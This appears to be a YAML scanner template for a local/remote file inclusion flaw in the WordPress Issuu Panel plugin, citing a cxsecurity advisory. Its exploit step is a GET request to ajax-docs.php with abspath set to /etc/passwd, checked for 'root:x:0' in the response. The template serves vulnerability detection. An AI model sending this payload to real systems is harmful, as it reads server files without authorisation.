product: WordPress
vName: Wordpress Plugin Issuu Panel - RFI & LFI
type: 文件读取
vID: [ ]
level: 3
vDesc: ''
version: ''
note: ''
search: { }
protocol: http
link: https://cxsecurity.com/issue/WLB-2016030131
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd
    verify:
      logic: and
      check:
        - body:
            value:
              -'root:x:0'
            logic: and
        - status: 200
